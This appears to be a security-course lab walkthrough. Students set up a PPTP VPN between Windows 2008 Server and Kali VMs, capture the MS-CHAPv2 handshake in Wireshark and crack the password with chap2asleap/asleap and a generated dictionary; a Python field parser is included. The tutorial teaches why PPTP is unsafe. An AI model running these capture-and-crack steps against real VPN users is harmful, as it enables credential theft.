Moxie Marlinspike has set up a cloud service that recovers any password sent via MS-CHAPv2 for $200. It does so by brute-forcing the single 56-bit DES key that the MS-CHAPv2 handshake reduces to, so it works no matter how strong the password is. We don't have $200 to spend, so we'll settle for a weaker attack using a dictionary of the top 10,000 passwords, which only finds passwords that are on the list or are simple variants of it.
The point is clear: PPTP with MS-CHAPv2 is unsafe to use. Even an attacker with very modest means can steal passwords from it.
This project uses the following tools:
Open Virtual Machine Settings and add a second Ethernet adapter.
In Virtual Machine Settings, configure Network Adapter 1 to use NAT and Network Adapter 2 to use a private Host-Only network, as shown below.
Start the Windows 2008 Server virtual machine and log in as Administrator with the password P@ssw0rd.
Click Start. Search for Network. Open "Network and Sharing Center".
Troubleshooting
If you are using the Win 2008 I handed out in class, and your virtual machine cannot start, saying that no operating system was found, go into VMware settings and remove the 102 MB hard disk.
Click "Manage Network Connections".
Right-click "Local Area Connection" and click Properties.
Double-click "Internet Protocol Version 4 (TCP/IP)".
Configure the adapter to "Obtain an IP address automatically" and "Obtain DNS server address automatically", as shown below.
Click OK. Click OK.
Right-click "Local Area Connection 2" and click Properties.
Double-click "Internet Protocol Version 4 (TCP/IP)".
Configure the adapter with a static address, as shown below. The later steps assume this adapter is 10.0.0.1 with subnet mask 255.0.0.0; the Kali VM will use 10.0.0.3 on the same private network.
In Server Manager, in the right pane, scroll down to the "Roles Summary" section, as shown below, and click "Add Roles".
In the "Add Roles Wizard", click Next.
In the "Select Server Roles" page, check "Network Policy and Access Server", as shown below.
Click Next. Click Next.
In the "Select Role Services" page, check "Network Policy Server" and "Routing and Remote Access Services", as shown below.
Click Next. Click Install.
When you see an "Installation succeeded" message, as shown below, click Close.
Right-click "Routing and Remote Access" and click "Configure and Enable Routing and Remote Access", as shown below.
In the "Welcome to the Routing and Remote Access Server Setup Wizard" screen, click Next.
In the "Configuration" screen, click "Custom Configuration", as shown below, and click Next.
In the "Custom Configuration" screen, check "VPN access", as shown below, and click Next.
Click OK.
Click "Start Service".
Click Finish.
Then Right-click on "Remote Access Logging and Policies", as shown below, and click "Launch NPS".
In Network Policy Server, in the left pane, click "Network Policies".
In the right pane, near the top, right-click "Connections to Microsoft Routing and Remote Access server" policy and click Properties.
In the center of the "Connections to Microsoft Routing and Remote Access server Properties" sheet, click "Grant Access" as shown below.
Click OK.
Close the "Network Policy Server" window.
On the General tab, check the "IPv4 Router" box.
Make sure that "Local area network (LAN) routing only" is selected, as shown below.
Check the "IPv4 Remote access server" box, as shown below.
Click the IPv4 tab.
Check the "Enable IPv4 Forwarding" box, as shown below.
Click OK.
The changes you made require the "Routing and Remote Access" server to restart. Click Yes to restart the server.
In the IPv4 section, right-click General, as shown below, and click "New Routing Protocol".
In the "New Routing Protocol" box, click NAT, as shown below.
Click OK.
In the left pane of Server Manager, in the IPv4 section, right-click NAT, and click "New Interface", as shown below.
In the "New Interface for IPNAT" box, click "Local Area Connection 2", the interface that connects to your private intranet, and then click OK, as shown below.
In "Local Area Connection 2 Properties", click "Private interface connected to private network", as shown below.
Then click OK, and click OK again.
Right-click NAT, and click "New Interface" again.
In the "New Interface for IPNAT" box, click "Local Area Connection" (the NAT adapter that reaches the Internet), and then click OK.
In "Local Area Connection Properties", click "Public interface connected to the Internet" and check "Enable NAT on this interface", as shown below.
Then click OK.
In the right pane, right-click an empty portion of the screen and click "New User", as shown below.
In the New User box, create a user named vpnuser with the password Bond007 (the same credentials we'll put in the Kali chap-secrets file later), as shown below.
Click Create. Click Close.
In Server Manager, in the left pane, right-click "Routing and Remote Access" and click Properties.
In the "Routing and Remote Access Properties" sheet, on the "Security" tab, click the "Authentication Methods" button.
In the "Authentication Methods" box, clear the "Extensible authentication protocol (EAP)" box, so that only "Microsoft encrypted authentication version 2 (MS-CHAP-v2)" is checked, as shown below.
Click OK. Click OK.
Execute these commands to download the hacking tool we need, and a list of the 10,000 most common passwords:
wget https://github.com/xiao106347/chap2asleap/raw/master/chap2asleap.py
curl https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10k-most-common.txt > words.dat
head words.dat
You see the first 10 passwords,
as shown below.
Troubleshooting
If those download links don't work, use these (the -O option saves the word list under the name the later commands expect):
curl https://samsclass.info/124/proj14/chap2asleap.pyx > chap2asleap.py
wget https://samsclass.info/124/proj14/10k_most_common.txt -O words.dat
We'll generate capitalized variants of the passwords with Bash commands, as you've done previously. The list is all lowercase, and the VPN password we created, Bond007, starts with a capital letter, so the plain list would miss it. First we'll work with only the first 10 words to develop the command, and then run it on the complete list.
Execute this command to select words that start with a letter:
head words.dat | grep "^[a-z].*"
The desired passwords appear,
as shown below.
Execute this command to convert the first letters of those passwords to uppercase:
head words.dat | grep "^[a-z].*" | sed -r 's/([[:lower:]])/\U\1/'
The desired passwords appear,
as shown below.
Execute these commands to put all the capitalized passwords into a file named Words.dat, and examine the files:
cat words.dat | grep "^[a-z].*" | sed -r 's/([[:lower:]])/\U\1/' > Words.dat
ls -l
The new file Words.dat is somewhat smaller
than words.dat, because it excludes passwords
that begin with a numeral,
as shown below.
Execute these commands to put all the passwords in a file named allwords.dat, and examine the files (use > rather than >>, so that re-running the command does not append a second copy of the list):
cat words.dat Words.dat > allwords.dat
ls -l
The new file allwords.dat
has a length equal to the sum of the
two files "words.dat" and "Words.dat",
as shown below.
In your Kali VM, execute these commands to install the PPTP client:
apt update
apt install pptp-linux
In your Kali VM, execute this command:
nano /etc/ppp/chap-secrets
Add this line to the file, as shown
below:
vpnuser PPTP Bond007 *
Save the file by pressing Ctrl+X, Y, Enter.
In your Kali VM, execute this command:
nano /etc/ppp/peers/YOURNAME-pptp
Enter these lines, as shown
below. Replace "YOURNAME"
with your own name, without
any embedded spaces.
pty "pptp 10.0.0.1 --nolaunchpppd"
name vpnuser
remotename PPTP
require-mppe-128
file /etc/ppp/options.pptp
ipparam YOURNAME-pptp
In Kali, in a Terminal window, execute these commands to assign an appropriate IP address to eth0 and test the networking:
ifconfig eth0 10.0.0.3/8
ping 10.0.0.1
You should see replies, as shown
below. If you don't, make sure
the Windows 2008 Server's
firewall is off.
Press Ctrl+C to stop the pings.
Troubleshooting
If you cannot ping from one machine to another, change both the Windows and Kali adapters to DHCP and refresh both IP addresses. Now ping from one to another using the DHCP address. Then assign the 10.0.0.0/8 addresses.
pon YOURNAME-pptp debug dump logfd 2 nodetach
A lot of messages scroll by, ending with the lines shown below, showing a "local IP address".
On the Windows 2008 Server, in Routing and Remote Access, click "Remote Access Clients". In the right pane, you should see a connected machine, as shown below.
Click on the host system's desktop to make it active.
Press the PrintScrn key to copy the whole desktop to the clipboard.
YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!
Paste the image into Paint.
Save the document with the filename "YOUR NAME Proj 10a", replacing "YOUR NAME" with your real name.
wireshark
A "Lua error" box appears. Click OK.
A box warns us that running as root is dangerous. We laugh at danger. Click OK.
In Wireshark, click eth0 and click Start.
In the Filter box, type:
chap
and press Enter.
The packet list should be empty, as shown below.
Then execute this command to connect again:
pon YOURNAME-pptp debug dump logfd 2 nodetach
A lot of messages scroll by, ending with the
lines shown below, showing a "local IP address".
Click the red square icon to stop the packet capture.
On your host system, open a text editor and paste in this command. You'll replace CHALLENGE and RESPONSE with values copied from Wireshark in the next steps:
python chap2asleap.py -u vpnuser -c CHALLENGE -r RESPONSE -x -p /usr/bin -d ./allwords.dat
This command will use our "allwords.dat" dictionary file and try all those passwords to match the CHALLENGE and RESPONSE strings we get from Wireshark.
At this point, your text editor should look like this:
In the top pane of Wireshark, click a Challenge packet. In the middle pane, expand PPP. Expand Data. Click on Value to highlight it, as shown below.
Right-click on Value and click Copy, "Hex Stream", as shown below.
On your host system, in the text editor, paste that hex stream in the place of CHALLENGE.
Your text editor should now resemble this image:
In the top pane of Wireshark, click a Response packet.
In the middle pane, click on Value. Right-click on Value and click Copy, "Hex Stream", as shown below.
On your host system, in the text editor, paste that hex stream in the place of RESPONSE.
Your text editor should now resemble this image:
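Before running it, it helps to see what chap2asleap does with those two hex strings. The following is an added example written for this page, not the page's chap2asleap.py and not asleap itself. It assumes the hex strings are what Wireshark's Copy > "Hex Stream" produces (contiguous lowercase hex with no separators), and the sample challenge and response values in it are constructed for illustration, not taken from a real capture. It splits the 49-byte Response value into its RFC 2759 fields, computes the 8-byte challenge hash that is actually DES-encrypted, and formats both the way asleap's -C and -R options expect.

```python
"""Split an MS-CHAPv2 Challenge/Response pair into the fields asleap uses.

Added example for this page, not the page's chap2asleap.py and not asleap
itself.  Field layout follows RFC 2759; the two hex strings below are
constructed for illustration, not taken from a real capture.
"""
import hashlib

AUTH_CHALLENGE_LEN = 16   # Value field of the MS-CHAPv2 Challenge packet
RESPONSE_VALUE_LEN = 49   # Value field of the MS-CHAPv2 Response packet

# Constructed sample data, in the form Wireshark's Copy > Hex Stream gives you.
SAMPLE_USER = "vpnuser"
SAMPLE_CHALLENGE = "00112233445566778899aabbccddeeff"
SAMPLE_RESPONSE = (
    "ffeeddccbbaa99887766554433221100"                  # 16-byte Peer-Challenge
    "0000000000000000"                                  # 8 reserved bytes (zero)
    "010203040506070801020304050607080102030405060708"  # 24-byte NT-Response
    "00"                                                # 1-byte Flags
)


def parse_mschapv2(username, challenge_hex, response_hex):
    """Return the pieces of the handshake that the offline attack needs."""
    auth_challenge = bytes.fromhex(challenge_hex)
    value = bytes.fromhex(response_hex)
    if len(auth_challenge) != AUTH_CHALLENGE_LEN:
        raise ValueError("Challenge Value must be %d bytes, got %d"
                         % (AUTH_CHALLENGE_LEN, len(auth_challenge)))
    if len(value) != RESPONSE_VALUE_LEN:
        raise ValueError("Response Value must be %d bytes, got %d; did you copy "
                         "the whole Value field?" % (RESPONSE_VALUE_LEN, len(value)))
    peer_challenge = value[0:16]
    nt_response = value[24:48]
    # RFC 2759 section 8.2: the 8-byte challenge that is DES-encrypted is
    # SHA1(PeerChallenge || AuthenticatorChallenge || UserName)[0:8].  The user
    # name is the bare account name, without any DOMAIN\ prefix.
    challenge_hash = hashlib.sha1(
        peer_challenge + auth_challenge + username.encode("ascii")
    ).digest()[:8]
    return {
        "peer_challenge": peer_challenge,
        "nt_response": nt_response,
        "flags": value[48],
        "challenge_hash": challenge_hash,
    }


def asleap_args(fields):
    """Format the challenge hash and NT-Response as asleap's -C and -R options
    expect them: colon-separated hex bytes."""
    colon = lambda b: ":".join("%02x" % x for x in b)
    return "-C %s -R %s" % (colon(fields["challenge_hash"]),
                            colon(fields["nt_response"]))


def des_blocks(fields):
    """The NT-Response is three independent DES encryptions of challenge_hash.
    The keys are the 16-byte NT hash (MD4 of the UTF-16LE password) padded with
    five zero bytes to 21 bytes and split into three 7-byte keys, so the third
    key contains only 2 real bytes of hash.  Block 3 can therefore be matched
    against just 65536 candidates, which is how asleap discards most dictionary
    words before doing any MD4 work."""
    r = fields["nt_response"]
    return r[0:8], r[8:16], r[16:24]


if __name__ == "__main__":
    fields = parse_mschapv2(SAMPLE_USER, SAMPLE_CHALLENGE, SAMPLE_RESPONSE)
    print("asleap", asleap_args(fields), "-W allwords.dat")
```

The length checks matter in practice: if you copy only part of the Value field, or copy the Challenge packet's Value for both, the attack silently fails rather than reporting a bad input. The user name goes into the SHA1 input, which is why chap2asleap needs -u vpnuser and why a capture against a different account cannot be reused.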
The attack should succeed immediately, finding the password, as shown below.
Notice how fast it was--this took only 0.06 seconds. We could easily use a much larger dictionary to make the attack even more powerful.
Click on the host system's desktop to make it active.
Press the PrintScrn key to copy the whole desktop to the clipboard.
YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!
Paste the image into Paint.
Save the document with the filename "YOUR NAME Proj 10b", replacing "YOUR NAME" with your real name.